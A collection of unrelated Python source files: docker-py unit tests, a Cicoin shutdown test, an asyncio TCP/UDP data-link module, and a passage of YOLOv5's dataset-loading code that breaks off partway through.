def test_build_container_invalid_container_limits(self):
self.assertRaises(
docker.errors.DockerException,
lambda: self.client.build('.', container_limits={
'foo': 'bar'
})
)
#######################
# PY SPECIFIC TESTS #
#######################
def test_load_config_no_file(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
cfg = docker.auth.load_config(folder)
self.assertTrue(cfg is not None)
def test_load_config(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, '.dockercfg')
with open(dockercfg_path, 'w') as f:
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = sakuya@scarlet.net')
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(docker.auth.INDEX_URL in cfg)
self.assertNotEqual(cfg[docker.auth.INDEX_URL], None)
cfg = cfg[docker.auth.INDEX_URL]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_with_random_name(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder,
'.{0}.dockercfg'.format(
random.randrange(100000)))
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
f.write(json.dumps(config))
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(registry in cfg)
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_tar_with_excludes(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['test/foo', 'bar']:
os.makedirs(os.path.join(base, d))
for f in ['a.txt', 'b.py', 'other.png']:
with open(os.path.join(base, d, f), 'w') as f:
f.write("content")
for exclude, names in (
(['*.py'], ['bar', 'bar/a.txt', 'bar/other.png',
'test', 'test/foo', 'test/foo/a.txt',
'test/foo/other.png']),
(['*.png', 'bar'], ['test', 'test/foo', 'test/foo/a.txt',
'test/foo/b.py']),
(['test/foo', 'a.txt'], ['bar', 'bar/a.txt', 'bar/b.py',
'bar/other.png', 'test']),
):
with docker.utils.tar(base, exclude=exclude) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), names)
def test_tar_with_empty_directory(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'foo'])
def test_tar_with_file_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
with open(os.path.join(base, 'foo'), 'w') as f:
f.write("content")
os.makedirs(os.path.join(base, 'bar'))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
def test_tar_with_directory_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
#######################
# HOST CONFIG TESTS #
#######################
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
docker.errors.DockerException, create_host_config,
security_opt='wrong'
)
class StreamTest(Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
if __name__ == '__main__':
unittest.main()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Cicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test cicoind shutdown."""
from test_framework.test_framework import CicoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(CicoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
dataLink.py
|
# MIT License
#
# Copyright (c) 2020 Gcom
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import multiprocessing
import threading
import traceback
import abc
from collections import namedtuple
from manager.basic.letter import receving
from typing import Dict, List, Callable, Any, \
Optional
from asyncio import StreamReader, StreamWriter
from manager.basic.mmanager import ModuleTDaemon
from manager.basic.letter import Letter
M_NAME = "DATALINKER"
address = str
port = int
tag = str
arg = Any
DataLinkNotify = namedtuple("notify", "tag msg")
class DATA_LINK_NOT_EXISTS(Exception):
def __init__(self, host: str, port: int) -> None:
self._host = host
self._port = port
def __str__(self) -> str:
return "DataLink(" + self._host + "," + str(self._port) + ")" + \
"does not exists."
class DATA_LINK_PROTO_NOT_SUPPORT(Exception):
def __init__(self, proto: str) -> None:
self._proto = proto
def __str__(self) -> str:
return "Protocol " + self._proto + " is not support."
class NOTIFIER_IS_ALREADY_EXISTS(Exception):
def __init__(self, tag: str) -> None:
self._tag = tag
def __str__(self) -> str:
return "Notifier " + self._tag + " is already exists."
class Notifier:
def __init__(self, callback: Callable[[Any, Any], None], arg: Any) -> None:
self._cb = callback
self._arg = arg
def notify(self, msg: Any) -> None:
self._cb(msg, self._arg)
class DataLink(abc.ABC):
TCP_DATALINK = "tcp"
UDP_DATALINK = "udp"
PROTO = ""
def __init__(self, host: str, port: int,
processor: Callable[['DataLink', Any, Any], None],
args: Any, notify_q: multiprocessing.Queue) -> None:
"""
protocol's value is TCP_DATALINK or UDP_DATALINK
"""
self.host = host
self.port = port
self._notifyQ = notify_q
# Processor
self._processor = processor # type: Callable[[DataLink, Any, Any], None]
self._args = args # type: Any
self._p = None # type: Optional[multiprocessing.Process]
def start(self) -> None:
self._p = multiprocessing.Process(
target=self.run, args=(self._notifyQ,))
self._p.start()
def stop(self) -> None:
if self._p is not None:
self._p.terminate()
def notify(self, notify: DataLinkNotify) -> None:
self._notifyQ.put_nowait(tuple(notify))
def run(self, notify_q: multiprocessing.Queue) -> None:
# Setup a loop for current thread.
asyncio.set_event_loop(
asyncio.new_event_loop())
try:
asyncio.run(self.datalink_create())
except asyncio.exceptions.CancelledError:
return
@abc.abstractclassmethod
async def datalink_create(self) -> None:
"""
Create datalink
"""
class TCPDataLink(DataLink):
PROTO = DataLink.TCP_DATALINK
async def datalink_create(self) -> None:
assert(self._processor is not None)
server = await asyncio.start_server(
self._tcp_datalink_factory, self.host, self.port)
async with server:
self.server = server
await server.serve_forever()
async def _tcp_datalink_factory(self, reader: StreamReader,
writer: StreamWriter) -> None:
while True:
try:
letter = await receving(reader)
await self._processor(self, letter, self._args) # type: ignore
except Exception:
writer.close()
break
class DataLinkProcProtocol(asyncio.BaseProtocol):
def __init__(self, dl: DataLink, processor: Callable, args: Any) -> None:
self._dl = dl
self._processor = processor
self._args = args
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self._transport = transport
def datagram_received(self, data, addr) -> None:
letter = Letter.parse(data)
self._processor(self._dl, letter, self._args)
class UDPDataLink(DataLink):
PROTO = DataLink.UDP_DATALINK
async def datalink_create(self) -> None:
loop = asyncio.get_running_loop()
transport, proto = await loop.create_datagram_endpoint(
lambda: DataLinkProcProtocol(self, self._processor, self._args),
local_addr=(self.host, self.port)
)
while True:
if not self._p.is_alive: # type: ignore
break
await asyncio.sleep(3600)
transport.close()
class DataLinker(ModuleTDaemon):
SUPPORT_PROTOS = {
DataLink.TCP_DATALINK: TCPDataLink,
DataLink.UDP_DATALINK: UDPDataLink
}
def __init__(self) -> None:
# Init as a Thread ModuleDaemon
ModuleTDaemon.__init__(self, M_NAME)
self._links = [] # type: List[DataLink]
self._msgQueue = multiprocessing.Queue(256) \
# type: multiprocessing.Queue[DataLinkNotify]
self._notify_cb = {} # type: Dict[tag, Notifier]
self._isNeedStop = False
def addDataLink(self, host: str, port: int, proto: str,
processor: Callable, args: Any) -> None:
# No replicate.
if self.isLinkExists(host, port, proto):
return None
if proto not in DataLinker.SUPPORT_PROTOS:
raise DATA_LINK_PROTO_NOT_SUPPORT(proto)
dl = DataLinker.SUPPORT_PROTOS[proto](
host, port, processor, args, self._msgQueue)
self._links.append(dl)
def addNotify(self, tag: str, cb: Callable[[Any, Any], None], arg: Any) -> None:
if tag in self._notify_cb:
raise NOTIFIER_IS_ALREADY_EXISTS(tag)
notifier = Notifier(cb, arg)
self._notify_cb[tag] = notifier
def isLinkExists(self, host: str, port: int, proto: str) -> bool:
match = [
dl for dl in self._links
if host == dl.host and port == dl.port and proto == dl.PROTO
]
return len(match) > 0
def start(self) -> None:
threading.Thread.start(self)
def is_alive(self) -> bool:
return threading.Thread.is_alive(self)
def run(self) -> None:
# Start all DataLinks
for dl in self._links:
dl.start()
# Deal with messages from DataLinks.
while True:
try:
tag, msg = self._msgQueue.get(timeout=3)
except multiprocessing.queues.Empty:
if self._isNeedStop is True:
break
continue
if tag not in self._notify_cb:
continue
try:
self._notify_cb[tag].notify(msg)
except Exception:
traceback.print_exc()
# Stop all DataLinks
for dl in self._links:
dl.stop()
def stop(self) -> None:
self._isNeedStop = True
async def begin(self) -> None:
return
async def cleanup(self) -> None:
return
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from .general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from .torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
img, labels = load_mosaic(self, index)
shapes = None
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0)
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
img, (h0, w0), (h, w) = load_image(self, index)
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad)
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
nL = len(labels)
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
labels[:, [2, 4]] /= img.shape[0]
labels[:, [1, 3]] /= img.shape[1]
if self.augment:
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
img = img[:, :, ::-1].transpose(2, 0, 1)
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
